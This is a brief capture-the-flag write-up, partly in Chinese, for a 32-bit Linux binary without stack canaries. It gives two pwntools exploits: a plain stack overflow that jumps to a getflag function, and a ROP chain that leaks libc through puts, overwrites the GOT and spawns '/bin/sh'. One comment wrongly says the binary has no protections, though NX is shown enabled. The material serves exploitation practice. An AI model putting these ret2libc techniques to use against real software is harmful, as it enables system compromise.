xx@ubuntu:~/Documents/rop$ file pwn
pwn: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=fca490f050dcf56b71eae329ced02a9d483aacf0, not stripped
xx@ubuntu:~/Documents/rop$ checksec pwn
[*] '/home/hu/Documents/rop/pwn'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
啥保护也没有
在ida里面打开后,发现有getflag函数,直接栈溢出
exp
from pwn import *
p=process('./pwn')
getflag=0x0804858B
payload = 'a'*(0x6c+4)+p32(getflag)
p.sendlineafter('try\n',payload)
p.interactive()
rop一下
from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']
p=process('./pwn')
elf=ELF('./pwn')
pop_1=0x08048381
pop_3=0x080485fd
bss = 0x804a000+0x400
payload = 'a'*(0x6c+4)+p32(elf.plt['puts'])+p32(pop_1)+p32(elf.got['puts'])
payload += p32(elf.plt['read'])+p32(pop_3)+p32(0)+p32(elf.got['puts'])+p32(4)
payload += p32(elf.plt['read'])+p32(pop_3)+p32(0)+p32(bss)+p32(8)
payload +=p32(elf.plt['puts'])+p32(0)+p32(bss)
p.sendlineafter('try\n',payload)
put=u32(p.recv(4).ljust(4,'\x00'))
libc = LibcSearcher('puts',put)
system = put-libc.dump('puts')+libc.dump('system')
p.send(p32(system))
p.send('/bin/sh\x00')
p.interactive()